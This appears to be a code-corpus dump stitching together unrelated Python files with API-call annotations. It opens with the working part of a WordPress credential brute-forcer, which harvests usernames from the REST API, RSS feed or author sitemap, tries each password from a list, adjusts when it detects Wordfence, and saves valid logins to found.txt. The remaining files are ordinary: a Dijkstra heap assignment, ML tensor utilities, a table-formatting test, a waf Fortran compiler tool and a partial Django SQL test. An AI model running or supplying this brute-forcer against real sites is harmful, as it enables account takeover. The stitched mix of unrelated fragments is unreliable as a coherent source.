print("[-] Website is giving 503 HTTP Status [-]")
sys.exit(0)
if response.status_code == 502:
print("[-] Website is giving 502 HTTP Status [-]")
sys.exit(0)
if response.status_code == 403:
print("[-] Website is giving 403 HTTP Status - WAF Blocking[-]")
sys.exit(0)
if "Google Authenticator code" in response.text:
print("[-] 2FA is enabled Sorry [-]")
sys.exit(0)
if "wordpress_logged_in" in response.headers['Set-Cookie']:
print("[+] Found Login Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [+]")
text_file = open("found.txt", "a")
text_file.write(""+url+" Found Login Username: "+user+" Password: "+password+"\n")
text_file.close()
sys.exit(0)
else:
print("[-] Login Failed for Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [-]")
cnt += 1
return cnt
def count_pass(passfile):
count = 0
with open(passfile, 'r') as f:
for line in f:
count += 1
f.close()
return str(count)
# Nobody likes dupes.
def remove_dupes():
lines_seen = set()
outfile = open("users.txt", "w")
for line in open("rssusers.txt", "r"):
if line not in lines_seen:
outfile.write(line)
lines_seen.add(line)
outfile.close()
def attack_restapi(url,attempts,userdata,passfile):
for id in userdata:
user = id['slug']
cnt = 1
print(("[+] Found User: "+user+" [+]"))
with open(passfile, 'r') as f:
for line in f:
password = line.strip()
cnt = test_login (url,user,password,cnt,attempts)
f.close()
def attack_rssfeed(url,attempts,userdata,passfile):
users = re.compile("<dc:creator><!(.+?)]]></dc:creator").findall(userdata)
if os.path.exists("rssusers.txt"):
os.remove("rssusers.txt")
if os.path.exists("users.txt"):
os.remove("users.txt")
for user in users:
u = user.replace("[CDATA[","")
text_file = open("rssusers.txt", "a")
text_file.write(""+str(u)+"\n")
text_file.close()
remove_dupes()
with open("users.txt", 'r') as f:
for line in f:
user = line.strip()
cnt = 1
print(("[+] Found User: "+user+" [+]"))
with open(passfile, 'r') as b:
for line in b:
password = line.strip()
cnt = test_login (url,user,password,cnt,attempts)
f.close()
b.close()
def attack_sitemap(url,attempts,userdata,passfile):
auth = re.findall(r'(<loc>(.*?)</loc>)\s',userdata)
for user in auth:
thisuser = user[1]
h = thisuser.split('/')
user = h[4]
cnt = 1
with open(passfile, 'r') as f:
for line in f:
password = line.strip()
cnt = test_login (url,user,password,cnt,attempts)
f.close()
# Basic sanity checks before attacking.
def basic_checks(url):
    return check_is_wp(url) and check_wpadmin(url)
if basic_checks(url):
print("[+] Confirmed Wordpress Website [+]")
else:
print ("[-] Sorry this is either not a wordpress website or there is a issue blocking wp-admin [-]")
sys.exit(0)
if os.path.isfile(passfile) and os.access(passfile, os.R_OK):
print("[+] Password List Used: "+passfile+" [+]")
else:
print("[-] Either the file is missing or not readable [-]")
sys.exit(0)
# Method Value for which method to enumerate users from
method = "None"
attempts = "None"
# Which method to use for enumeration
if grab_users_api(url):
print("[+] Users found via Rest API [-]")
method = "restapi"
if grab_users_rssfeed(url) and method == "None":
print("[+] Users found via RSS Feed [+]")
method = "rss"
if grab_users_sitemap(url) and method == "None":
print("[+] Users found via Authors Sitemap [-]")
method = "sitemap"
if method == "None":
print ("[-] Oh Shit it seems I was unable to find a method to grab usernames from [-]")
sys.exit(0)
if check_wordfence(url):
print ("[+] Wordfence is installed this will limit the testing to 20 attempts [+]")
attempts = "20"
# Kick off Parsing and attacking
if method == "restapi":
userdata = grab_users_api(url)
attack_restapi(url,attempts,userdata,passfile)
if method == "rss":
userdata = grab_users_rssfeed(url)
attack_rssfeed(url,attempts,userdata,passfile)
if method == "sitemap":
userdata = grab_users_sitemap(url)
attack_sitemap(url,attempts,userdata,passfile)
| [((16, 0, 16, 66), 'requests.packages.urllib3.disable_warnings', 'requests.packages.urllib3.disable_warnings', ({(16, 43, 16, 65): 'InsecureRequestWarning'}, {}), '(InsecureRequestWarning)', False, 'import requests\n'), ((17, 10, 17, 28), 'requests.Session', 'requests.Session', ({}, {}), '()', False, 'import requests\n'), ((20, 9, 20, 34), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({}, {}), '()', False, 'import argparse\n'), ((208, 8, 208, 52), 're.findall', 're.findall', ({(208, 19, 208, 42): '"""(<loc>(.*?)</loc>)\\\\s"""', (208, 43, 208, 51): 'userdata'}, {}), "('(<loc>(.*?)</loc>)\\\\s', userdata)", False, 'import re\n'), ((238, 1, 238, 12), 'sys.exit', 'sys.exit', ({(238, 10, 238, 11): '(0)'}, {}), '(0)', False, 'import sys\n'), ((244, 4, 244, 15), 'sys.exit', 'sys.exit', ({(244, 13, 244, 14): '(0)'}, {}), '(0)', False, 'import sys\n'), ((265, 1, 265, 12), 'sys.exit', 'sys.exit', ({(265, 10, 265, 11): '(0)'}, {}), '(0)', False, 'import sys\n'), ((114, 2, 114, 13), 'sys.exit', 'sys.exit', ({(114, 11, 114, 12): '(0)'}, {}), '(0)', False, 'import sys\n'), ((121, 2, 121, 13), 'sys.exit', 'sys.exit', ({(121, 11, 121, 12): '(0)'}, {}), '(0)', False, 'import sys\n'), ((124, 2, 124, 13), 'sys.exit', 'sys.exit', ({(124, 11, 124, 12): '(0)'}, {}), '(0)', False, 'import sys\n'), ((127, 2, 127, 13), 'sys.exit', 'sys.exit', ({(127, 11, 127, 12): '(0)'}, {}), '(0)', False, 'import sys\n'), ((130, 2, 130, 13), 'sys.exit', 'sys.exit', ({(130, 11, 130, 12): '(0)'}, {}), '(0)', False, 'import sys\n'), ((137, 2, 137, 13), 'sys.exit', 'sys.exit', ({(137, 11, 137, 12): '(0)'}, {}), '(0)', False, 'import sys\n'), ((49, 12, 49, 40), 'json.loads', 'json.loads', ({(49, 23, 49, 39): 'response.content'}, {}), '(response.content)', False, 'import json\n'), ((180, 9, 180, 57), 're.compile', 're.compile', ({(180, 20, 180, 56): '"""<dc:creator><!(.+?)]]></dc:creator"""'}, {}), "('<dc:creator><!(.+?)]]></dc:creator')", False, 'import re\n')] |
liaoaoyuan97/standford_algorithms_specialization | graph_search/week2/assignment_dijkstra_shortest_paths.py | 2914fdd397ce895d986ac855e78afd7a51ceff68 | import heapq
import time
from os import path
from math import floor
class Heap:
def __init__(self):
self.size = 0
self.array = []
self.v2index_map = {}
def __get_parent_index(self, idx):
return int(floor((idx - 1) / 2))
def __get_left_child_index(self, idx):
return 2 * idx + 1
def __get_right_child_index(self, idx):
return 2 * idx + 2
def __swap_value(self, i, j):
t = self.array[i]
self.v2index_map[t[0]] = j
self.v2index_map[self.array[j][0]] = i
self.array[i] = self.array[j]
self.array[j] = t
def __bubble_up(self, idx):
parent_idx = self.__get_parent_index(idx)
while parent_idx >= 0:
if self.array[parent_idx][1] <= self.array[idx][1]:
break
self.__swap_value(parent_idx, idx)
idx = parent_idx
parent_idx = self.__get_parent_index(idx)
def __bubble_down(self, idx):
left_idx = self.__get_left_child_index(idx)
right_idx = self.__get_right_child_index(idx)
while left_idx < self.size or right_idx < self.size:
min_idx = left_idx
if left_idx >= self.size or (right_idx < self.size and self.array[right_idx][1] < self.array[left_idx][1]):
min_idx = right_idx
if self.array[idx][1] < self.array[min_idx][1]:
break
self.__swap_value(idx, min_idx)
idx = min_idx
left_idx = self.__get_left_child_index(idx)
right_idx = self.__get_right_child_index(idx)
def get_vertex_key(self, v_id):
return self.array[self.v2index_map[v_id]][1]
def pop(self):
if self.size < 1:
raise IndexError
min_node = self.array[0]
self.size = self.size - 1
self.__swap_value(0, self.size)
self.array.pop()
if self.size > 1:
self.__bubble_down(0)
del self.v2index_map[min_node[0]]
return min_node
def insert(self, node):
self.array.append(node)
self.v2index_map[node[0]] = self.size
self.size = self.size + 1
if self.size > 1:
self.__bubble_up(self.size - 1)
def modify_key(self, v_id, update_val):
idx = self.v2index_map[v_id]
self.array[idx] = (v_id, update_val)
parent_idx = self.__get_parent_index(idx)
if parent_idx >= 0 and self.array[idx][1] < self.array[parent_idx][1]:
self.__bubble_up(idx)
else:
self.__bubble_down(idx)
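
# A minimal usage sketch: the heap stores (vertex_id, key) pairs and supports
# a true decrease-key via `modify_key`, which `heapq` lacks.
#   h = Heap()
#   h.insert((1, 5))
#   h.insert((2, 3))
#   h.modify_key(1, 1)   # decrease vertex 1's key from 5 to 1
#   h.pop()              # -> (1, 1)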
def read_graph(filename):
graph = dict()
with open(path.join('.', filename), 'r') as f:
for row in f.readlines():
edges = row.strip('\t\n').split('\t')
s = int(edges[0])
graph[s] = []
for i in range(1, len(edges)):
edge = edges[i].split(',')
graph[s].append((int(edge[0]), int(edge[1])))
return graph
def get_shortest_paths_heapq(graph):
heap = []
heapq.heappush(heap, (0, 1)) # (dj_score, vertex_id)
distances = {i: 1000000 for i in graph}
distances[1] = 0
X = []
while heap:
cur_distance, cur_v = heapq.heappop(heap)
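        # Lazy deletion: the heap may hold stale (distance, vertex) entries
        # superseded by a shorter path found later; skip them here instead of
        # implementing decrease-key on top of heapq.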
if cur_distance > distances[cur_v]:
continue
# added to X
X.append(cur_v)
for neighbor, weight in graph[cur_v]:
dj_score = cur_distance + weight
if dj_score < distances[neighbor]:
distances[neighbor] = dj_score
heapq.heappush(heap, (dj_score, neighbor))
return distances, X
def get_shortest_paths_self_defined_heap(graph):
heap = Heap()
heap.insert((1, 0)) # (vertex_id, dj_score)
for v in graph:
if v != 1:
heap.insert((v, 1000000))
shortest_paths = dict()
n_v = len(graph)
while len(shortest_paths) < n_v:
assert len(shortest_paths) + heap.size == n_v
cur_v, v_score = heap.pop()
shortest_paths[cur_v] = v_score
for neighbor, weight in graph[cur_v]:
dj_score = v_score + weight
if neighbor not in shortest_paths and dj_score < heap.get_vertex_key(neighbor):
heap.modify_key(neighbor, dj_score)
return shortest_paths
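
# Note the trade-off between the two implementations: the heapq version relies
# on lazy deletion, so a vertex can sit in the heap several times, while the
# hand-rolled Heap performs a true decrease-key, keeping each vertex in the
# heap at most once.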
if __name__ == "__main__":
# test case 1, output: {1: 0, 2: 1, 3: 2, 4: 2, 5: 3, 6: 4}
# graph = {
# 1: [(6, 7), (5, 3), (2, 1), (4, 2), (3, 3)],
# 2: [(1, 1), (3, 1), (4, 1), (6, 6)],
# 3: [(1, 3), (2, 1), (6, 2)],
# 4: [(2, 1), (1, 2), (6, 5)],
# 5: [(1, 3), (6, 3)],
# 6: [(1, 7), (3, 2), (2, 6), (4, 5), (5, 3)]
# }
graph = read_graph("Dijkstra.txt")
dedup_edges = set()
for k, _ in graph.items():
for v in _:
dedup_edges.add((k, v[0], v[1]))
dedup_edges.add((v[0], k, v[1]))
assert len(dedup_edges) == sum([len(e) for e in graph.values()])
start_t = time.time()
min_distances,X = get_shortest_paths_heapq(graph)
print(time.time() - start_t)
# print(min_distances)
e = [7, 37, 59, 82, 99, 115, 133, 165, 188, 197]
print(",".join([str(int(min_distances[i])) for i in e]))
start_t = time.time()
    min_distances = get_shortest_paths_self_defined_heap(graph)
print(time.time() - start_t)
# print(min_distances)
e = [7, 37, 59, 82, 99, 115, 133, 165, 188, 197]
print(",".join([str(int(min_distances[i])) for i in e]))
| [((114, 4, 114, 32), 'heapq.heappush', 'heapq.heappush', ({(114, 19, 114, 23): 'heap', (114, 25, 114, 31): '(0, 1)'}, {}), '(heap, (0, 1))', False, 'import heapq\n'), ((188, 14, 188, 25), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((196, 14, 196, 25), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((120, 30, 120, 49), 'heapq.heappop', 'heapq.heappop', ({(120, 44, 120, 48): 'heap'}, {}), '(heap)', False, 'import heapq\n'), ((14, 19, 14, 39), 'math.floor', 'floor', ({(14, 25, 14, 38): '((idx - 1) / 2)'}, {}), '((idx - 1) / 2)', False, 'from math import floor\n'), ((99, 14, 99, 38), 'os.path.join', 'path.join', ({(99, 24, 99, 27): '"""."""', (99, 29, 99, 37): 'filename'}, {}), "('.', filename)", False, 'from os import path\n'), ((190, 10, 190, 21), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((198, 10, 198, 21), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((131, 16, 131, 58), 'heapq.heappush', 'heapq.heappush', ({(131, 31, 131, 35): 'heap', (131, 37, 131, 57): '(dj_score, neighbor)'}, {}), '(heap, (dj_score, neighbor))', False, 'import heapq\n')] |
huimlight/SoftTeacher | ssod/utils/structure_utils.py | 97064fbcce1ab87b40977544ba7a9c488274d66f | import warnings
from collections import Counter
from collections.abc import Mapping, Sequence
from numbers import Number
from typing import Dict, List
import numpy as np
import torch
from mmdet.core.mask.structures import BitmapMasks
from torch.nn import functional as F
_step_counter = Counter()
def list_concat(data_list: List[list]):
if isinstance(data_list[0], torch.Tensor):
return torch.cat(data_list)
else:
endpoint = [d for d in data_list[0]]
for i in range(1, len(data_list)):
endpoint.extend(data_list[i])
return endpoint
def sequence_concat(a, b):
if isinstance(a, Sequence) and isinstance(b, Sequence):
return a + b
else:
return None
def dict_concat(dicts: List[Dict[str, list]]):
return {k: list_concat([d[k] for d in dicts]) for k in dicts[0].keys()}
def dict_fuse(obj_list, reference_obj):
if isinstance(reference_obj, torch.Tensor):
return torch.stack(obj_list)
return obj_list
def dict_select(dict1: Dict[str, list], key: str, value: str):
flag = [v == value for v in dict1[key]]
return {
k: dict_fuse([vv for vv, ff in zip(v, flag) if ff], v) for k, v in dict1.items()
}
def dict_split(dict1, key):
group_names = list(set(dict1[key]))
dict_groups = {k: dict_select(dict1, key, k) for k in group_names}
return dict_groups
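
# Illustrative example (hypothetical keys):
#   dict_split({"tag": ["a", "b", "a"], "x": [1, 2, 3]}, "tag")
#   -> {"a": {"tag": ["a", "a"], "x": [1, 3]},
#       "b": {"tag": ["b"], "x": [2]}}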
def dict_sum(a, b):
if isinstance(a, dict):
assert isinstance(b, dict)
return {k: dict_sum(v, b[k]) for k, v in a.items()}
elif isinstance(a, list):
assert len(a) == len(b)
return [dict_sum(aa, bb) for aa, bb in zip(a, b)]
else:
return a + b
def zero_like(tensor_pack, prefix=""):
if isinstance(tensor_pack, Sequence):
return [zero_like(t) for t in tensor_pack]
elif isinstance(tensor_pack, Mapping):
return {prefix + k: zero_like(v) for k, v in tensor_pack.items()}
elif isinstance(tensor_pack, torch.Tensor):
return tensor_pack.new_zeros(tensor_pack.shape)
elif isinstance(tensor_pack, np.ndarray):
return np.zeros_like(tensor_pack)
else:
warnings.warn("Unexpected data type {}".format(type(tensor_pack)))
return 0
def pad_stack(tensors, shape, pad_value=255):
tensors = torch.stack(
[
F.pad(
tensor,
pad=[0, shape[1] - tensor.shape[1], 0, shape[0] - tensor.shape[0]],
value=pad_value,
)
for tensor in tensors
]
)
return tensors
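
# Shape example: each 2-D tensor is padded on the right/bottom to `shape` with
# `pad_value`, then the padded tensors are stacked along a new first axis:
#   a: (2, 3), b: (1, 2), shape == (2, 3)  ->  output: (2, 2, 3)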
def result2bbox(result):
num_class = len(result)
bbox = np.concatenate(result)
if bbox.shape[0] == 0:
label = np.zeros(0, dtype=np.uint8)
else:
label = np.concatenate(
[[i] * len(result[i]) for i in range(num_class) if len(result[i]) > 0]
).reshape((-1,))
return bbox, label
def result2mask(result):
num_class = len(result)
mask = [np.stack(result[i]) for i in range(num_class) if len(result[i]) > 0]
if len(mask) > 0:
mask = np.concatenate(mask)
else:
mask = np.zeros((0, 1, 1))
return BitmapMasks(mask, mask.shape[1], mask.shape[2]), None
def sequence_mul(obj, multiplier):
if isinstance(obj, Sequence):
return [o * multiplier for o in obj]
else:
return obj * multiplier
def is_match(word, word_list):
for keyword in word_list:
if keyword in word:
return True
return False
def weighted_loss(loss: dict, weight, ignore_keys=[], warmup=0):
_step_counter["weight"] += 1
lambda_weight = (
lambda x: x * (_step_counter["weight"] - 1) / warmup
if _step_counter["weight"] <= warmup
else x
)
if isinstance(weight, Mapping):
for k, v in weight.items():
for name, loss_item in loss.items():
if (k in name) and ("loss" in name):
loss[name] = sequence_mul(loss[name], lambda_weight(v))
elif isinstance(weight, Number):
for name, loss_item in loss.items():
if "loss" in name:
if not is_match(name, ignore_keys):
loss[name] = sequence_mul(loss[name], lambda_weight(weight))
else:
loss[name] = sequence_mul(loss[name], 0.0)
else:
raise NotImplementedError()
return loss
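
# A minimal usage sketch (hypothetical loss keys): scale every loss whose key
# contains a group name. Past the warmup, `lambda_weight` passes the weight
# through unchanged, so
#   weighted_loss({"sup_loss_cls": 1.0, "unsup_loss_cls": 1.0},
#                 weight={"unsup": 2.0})
# returns {"sup_loss_cls": 1.0, "unsup_loss_cls": 2.0}.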
| [((11, 16, 11, 25), 'collections.Counter', 'Counter', ({}, {}), '()', False, 'from collections import Counter, Mapping, Sequence\n'), ((98, 11, 98, 33), 'numpy.concatenate', 'np.concatenate', ({(98, 26, 98, 32): 'result'}, {}), '(result)', True, 'import numpy as np\n'), ((16, 15, 16, 35), 'torch.cat', 'torch.cat', ({(16, 25, 16, 34): 'data_list'}, {}), '(data_list)', False, 'import torch\n'), ((38, 15, 38, 36), 'torch.stack', 'torch.stack', ({(38, 27, 38, 35): 'obj_list'}, {}), '(obj_list)', False, 'import torch\n'), ((100, 16, 100, 43), 'numpy.zeros', 'np.zeros', (), '', True, 'import numpy as np\n'), ((110, 12, 110, 31), 'numpy.stack', 'np.stack', ({(110, 21, 110, 30): 'result[i]'}, {}), '(result[i])', True, 'import numpy as np\n'), ((112, 15, 112, 35), 'numpy.concatenate', 'np.concatenate', ({(112, 30, 112, 34): 'mask'}, {}), '(mask)', True, 'import numpy as np\n'), ((114, 15, 114, 34), 'numpy.zeros', 'np.zeros', ({(114, 24, 114, 33): '(0, 1, 1)'}, {}), '((0, 1, 1))', True, 'import numpy as np\n'), ((115, 11, 115, 58), 'mmdet.core.mask.structures.BitmapMasks', 'BitmapMasks', ({(115, 23, 115, 27): 'mask', (115, 29, 115, 42): 'mask.shape[1]', (115, 44, 115, 57): 'mask.shape[2]'}, {}), '(mask, mask.shape[1], mask.shape[2])', False, 'from mmdet.core.mask.structures import BitmapMasks\n'), ((84, 12, 88, 13), 'torch.nn.functional.pad', 'F.pad', (), '', True, 'from torch.nn import functional as F\n'), ((75, 15, 75, 41), 'numpy.zeros_like', 'np.zeros_like', ({(75, 29, 75, 40): 'tensor_pack'}, {}), '(tensor_pack)', True, 'import numpy as np\n')] |
zzl0/cli_helpers | tests/tabular_output/test_terminaltables_adapter.py | 266645937423225bdb636ef6aa659f1a40ceec5f | # -*- coding: utf-8 -*-
"""Test the terminaltables output adapter."""
from __future__ import unicode_literals
from textwrap import dedent
import pytest
from cli_helpers.compat import HAS_PYGMENTS
from cli_helpers.tabular_output import terminaltables_adapter
if HAS_PYGMENTS:
from pygments.style import Style
from pygments.token import Token
def test_terminal_tables_adapter():
"""Test the terminaltables output adapter."""
data = [['abc', 1], ['d', 456]]
headers = ['letters', 'number']
output = terminaltables_adapter.adapter(
iter(data), headers, table_format='ascii')
assert "\n".join(output) == dedent('''\
+---------+--------+
| letters | number |
+---------+--------+
| abc | 1 |
| d | 456 |
+---------+--------+''')
@pytest.mark.skipif(not HAS_PYGMENTS, reason='requires the Pygments library')
def test_style_output_table():
"""Test that *style_output_table()* styles the output table."""
class CliStyle(Style):
default_style = ""
styles = {
Token.Output.TableSeparator: '#ansired',
}
headers = ['h1', 'h2']
data = [['观音', '2'], ['Ποσειδῶν', 'b']]
style_output_table = terminaltables_adapter.style_output_table('ascii')
style_output_table(data, headers, style=CliStyle)
output = terminaltables_adapter.adapter(iter(data), headers, table_format='ascii')
assert "\n".join(output) == dedent('''\
\x1b[31;01m+\x1b[39;00m''' + (
('\x1b[31;01m-\x1b[39;00m' * 10) +
'\x1b[31;01m+\x1b[39;00m' +
('\x1b[31;01m-\x1b[39;00m' * 4)) +
'''\x1b[31;01m+\x1b[39;00m
\x1b[31;01m|\x1b[39;00m h1 \x1b[31;01m|\x1b[39;00m''' +
''' h2 \x1b[31;01m|\x1b[39;00m
''' + '\x1b[31;01m+\x1b[39;00m' + (
('\x1b[31;01m-\x1b[39;00m' * 10) +
'\x1b[31;01m+\x1b[39;00m' +
('\x1b[31;01m-\x1b[39;00m' * 4)) +
'''\x1b[31;01m+\x1b[39;00m
\x1b[31;01m|\x1b[39;00m 观音 \x1b[31;01m|\x1b[39;00m''' +
''' 2 \x1b[31;01m|\x1b[39;00m
\x1b[31;01m|\x1b[39;00m Ποσειδῶν \x1b[31;01m|\x1b[39;00m''' +
''' b \x1b[31;01m|\x1b[39;00m
''' + '\x1b[31;01m+\x1b[39;00m' + (
('\x1b[31;01m-\x1b[39;00m' * 10) +
'\x1b[31;01m+\x1b[39;00m' +
('\x1b[31;01m-\x1b[39;00m' * 4)) +
'\x1b[31;01m+\x1b[39;00m')
| [((32, 1, 32, 77), 'pytest.mark.skipif', 'pytest.mark.skipif', (), '', False, 'import pytest\n'), ((43, 25, 43, 75), 'cli_helpers.tabular_output.terminaltables_adapter.style_output_table', 'terminaltables_adapter.style_output_table', ({(43, 67, 43, 74): '"""ascii"""'}, {}), "('ascii')", False, 'from cli_helpers.tabular_output import terminaltables_adapter\n'), ((23, 32, 29, 32), 'textwrap.dedent', 'dedent', ({(23, 39, 29, 31): '""" +---------+--------+\n | letters | number |\n +---------+--------+\n | abc | 1 |\n | d | 456 |\n +---------+--------+"""'}, {}), '(\n """ +---------+--------+\n | letters | number |\n +---------+--------+\n | abc | 1 |\n | d | 456 |\n +---------+--------+"""\n )', False, 'from textwrap import dedent\n'), ((48, 32, 69, 34), 'textwrap.dedent', 'dedent', ({(48, 39, 69, 33): '(\' \\x1b[31;01m+\\x1b[39;00m\' + (\'\\x1b[31;01m-\\x1b[39;00m\' * 10 +\n \'\\x1b[31;01m+\\x1b[39;00m\' + \'\\x1b[31;01m-\\x1b[39;00m\' * 4) +\n """\x1b[31;01m+\x1b[39;00m\n \x1b[31;01m|\x1b[39;00m h1 \x1b[31;01m|\x1b[39;00m"""\n + \' h2 \\x1b[31;01m|\\x1b[39;00m\\n \' + \'\\x1b[31;01m+\\x1b[39;00m\' +\n (\'\\x1b[31;01m-\\x1b[39;00m\' * 10 + \'\\x1b[31;01m+\\x1b[39;00m\' + \n \'\\x1b[31;01m-\\x1b[39;00m\' * 4) +\n """\x1b[31;01m+\x1b[39;00m\n \x1b[31;01m|\x1b[39;00m 观音 \x1b[31;01m|\x1b[39;00m"""\n +\n """ 2 \x1b[31;01m|\x1b[39;00m\n \x1b[31;01m|\x1b[39;00m Ποσειδῶν \x1b[31;01m|\x1b[39;00m"""\n + \' b \\x1b[31;01m|\\x1b[39;00m\\n \' + \'\\x1b[31;01m+\\x1b[39;00m\' +\n (\'\\x1b[31;01m-\\x1b[39;00m\' * 10 + \'\\x1b[31;01m+\\x1b[39;00m\' + \n \'\\x1b[31;01m-\\x1b[39;00m\' * 4) + \'\\x1b[31;01m+\\x1b[39;00m\')'}, {}), '(\' \\x1b[31;01m+\\x1b[39;00m\' + (\'\\x1b[31;01m-\\x1b[39;00m\' * 10 +\n \'\\x1b[31;01m+\\x1b[39;00m\' + \'\\x1b[31;01m-\\x1b[39;00m\' * 4) +\n """\x1b[31;01m+\x1b[39;00m\n \x1b[31;01m|\x1b[39;00m h1 \x1b[31;01m|\x1b[39;00m"""\n + \' h2 \\x1b[31;01m|\\x1b[39;00m\\n \' + \'\\x1b[31;01m+\\x1b[39;00m\' +\n (\'\\x1b[31;01m-\\x1b[39;00m\' * 10 + \'\\x1b[31;01m+\\x1b[39;00m\' + \n \'\\x1b[31;01m-\\x1b[39;00m\' * 4) +\n """\x1b[31;01m+\x1b[39;00m\n \x1b[31;01m|\x1b[39;00m 观音 \x1b[31;01m|\x1b[39;00m"""\n +\n """ 2 \x1b[31;01m|\x1b[39;00m\n \x1b[31;01m|\x1b[39;00m Ποσειδῶν \x1b[31;01m|\x1b[39;00m"""\n + \' b \\x1b[31;01m|\\x1b[39;00m\\n \' + \'\\x1b[31;01m+\\x1b[39;00m\' +\n (\'\\x1b[31;01m-\\x1b[39;00m\' * 10 + \'\\x1b[31;01m+\\x1b[39;00m\' + \n \'\\x1b[31;01m-\\x1b[39;00m\' * 4) + \'\\x1b[31;01m+\\x1b[39;00m\')', False, 'from textwrap import dedent\n')] |
jeikabu/lumberyard | dev/Tools/build/waf-1.7.13/waflib/extras/fc_xlf.py | 07228c605ce16cbf5aaa209a94a3cb9d6c1a4115 | #! /usr/bin/env python
# encoding: utf-8
# harald at klimachs.de
import re
from waflib import Utils,Errors
from waflib.Tools import fc,fc_config,fc_scan
from waflib.Configure import conf
from waflib.Tools.compiler_fc import fc_compiler
fc_compiler['aix'].insert(0, 'fc_xlf')
@conf
def find_xlf(conf):
"""Find the xlf program (will look in the environment variable 'FC')"""
fc = conf.find_program(['xlf2003_r', 'xlf2003', 'xlf95_r', 'xlf95', 'xlf90_r', 'xlf90', 'xlf_r', 'xlf'], var='FC')
fc = conf.cmd_to_list(fc)
conf.get_xlf_version(fc)
conf.env.FC_NAME='XLF'
@conf
def xlf_flags(conf):
v = conf.env
v['FCDEFINES_ST'] = '-WF,-D%s'
v['FCFLAGS_fcshlib'] = ['-qpic=small']
v['FCFLAGS_DEBUG'] = ['-qhalt=w']
v['LINKFLAGS_fcshlib'] = ['-Wl,-shared']
@conf
def xlf_modifier_platform(conf):
dest_os = conf.env['DEST_OS'] or Utils.unversioned_sys_platform()
xlf_modifier_func = getattr(conf, 'xlf_modifier_' + dest_os, None)
if xlf_modifier_func:
xlf_modifier_func()
@conf
def get_xlf_version(conf, fc):
"""Get the compiler version"""
cmd = fc + ['-qversion']
try:
out, err = conf.cmd_and_log(cmd, output=0)
except Errors.WafError:
conf.fatal('Could not find xlf %r' % cmd)
for v in (r"IBM XL Fortran.* V(?P<major>\d*)\.(?P<minor>\d*)",):
version_re = re.compile(v, re.I).search
match = version_re(out or err)
if match:
k = match.groupdict()
conf.env['FC_VERSION'] = (k['major'], k['minor'])
break
else:
conf.fatal('Could not determine the XLF version.')
def configure(conf):
conf.find_xlf()
conf.find_ar()
conf.fc_flags()
conf.fc_add_flags()
conf.xlf_flags()
conf.xlf_modifier_platform()
| [((17, 6, 17, 115), 'waflib.Configure.conf.find_program', 'conf.find_program', (), '', False, 'from waflib.Configure import conf\n'), ((18, 6, 18, 26), 'waflib.Configure.conf.cmd_to_list', 'conf.cmd_to_list', ({(18, 23, 18, 25): 'fc'}, {}), '(fc)', False, 'from waflib.Configure import conf\n'), ((19, 1, 19, 25), 'waflib.Configure.conf.get_xlf_version', 'conf.get_xlf_version', ({(19, 22, 19, 24): 'fc'}, {}), '(fc)', False, 'from waflib.Configure import conf\n'), ((58, 1, 58, 16), 'waflib.Configure.conf.find_xlf', 'conf.find_xlf', ({}, {}), '()', False, 'from waflib.Configure import conf\n'), ((59, 1, 59, 15), 'waflib.Configure.conf.find_ar', 'conf.find_ar', ({}, {}), '()', False, 'from waflib.Configure import conf\n'), ((60, 1, 60, 16), 'waflib.Configure.conf.fc_flags', 'conf.fc_flags', ({}, {}), '()', False, 'from waflib.Configure import conf\n'), ((61, 1, 61, 20), 'waflib.Configure.conf.fc_add_flags', 'conf.fc_add_flags', ({}, {}), '()', False, 'from waflib.Configure import conf\n'), ((62, 1, 62, 17), 'waflib.Configure.conf.xlf_flags', 'conf.xlf_flags', ({}, {}), '()', False, 'from waflib.Configure import conf\n'), ((63, 1, 63, 29), 'waflib.Configure.conf.xlf_modifier_platform', 'conf.xlf_modifier_platform', ({}, {}), '()', False, 'from waflib.Configure import conf\n'), ((32, 34, 32, 66), 'waflib.Utils.unversioned_sys_platform', 'Utils.unversioned_sys_platform', ({}, {}), '()', False, 'from waflib import Utils, Errors\n'), ((43, 13, 43, 44), 'waflib.Configure.conf.cmd_and_log', 'conf.cmd_and_log', (), '', False, 'from waflib.Configure import conf\n'), ((55, 2, 55, 52), 'waflib.Configure.conf.fatal', 'conf.fatal', ({(55, 13, 55, 51): '"""Could not determine the XLF version."""'}, {}), "('Could not determine the XLF version.')", False, 'from waflib.Configure import conf\n'), ((45, 2, 45, 43), 'waflib.Configure.conf.fatal', 'conf.fatal', ({(45, 13, 45, 42): "('Could not find xlf %r' % cmd)"}, {}), "('Could not find xlf %r' % cmd)", False, 'from waflib.Configure import conf\n'), ((48, 15, 48, 34), 're.compile', 're.compile', ({(48, 26, 48, 27): 'v', (48, 29, 48, 33): 're.I'}, {}), '(v, re.I)', False, 'import re\n')] |
MeGustas-5427/SQL_Tutorials | tutorials/create_table/tests.py | 627372c2d5d8656d72645830c9a1fae1df278fc7 | #!/usr/bin/python3
# -*- coding:utf-8 -*-
# __author__ = '__MeGustas__'
from django.test import TestCase
from django.db import connection
from tutorials.create_table.models import *
# Create your tests here.
class TestHealthFile(TestCase):
def setUp(self):
cursor = connection.cursor()
# Populate Customers table
cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact, cust_email) \
VALUES('1000000001', 'Village Toys', '200 Maple Lane', 'Detroit', 'MI', '44444', 'USA', 'John Smith', '[email protected]');")
cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact) \
VALUES('1000000002', 'Kids Place', '333 South Lake Drive', 'Columbus', 'OH', '43333', 'USA', 'Michelle Green');")
cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact, cust_email) \
VALUES('1000000003', 'Fun4All', '1 Sunny Place', 'Muncie', 'IN', '42222', 'USA', 'Jim Jones', '[email protected]');")
cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact, cust_email) \
VALUES('1000000004', 'Fun4All', '829 Riverside Drive', 'Phoenix', 'AZ', '88888', 'USA', 'Denise L. Stephens', '[email protected]');")
cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact) \
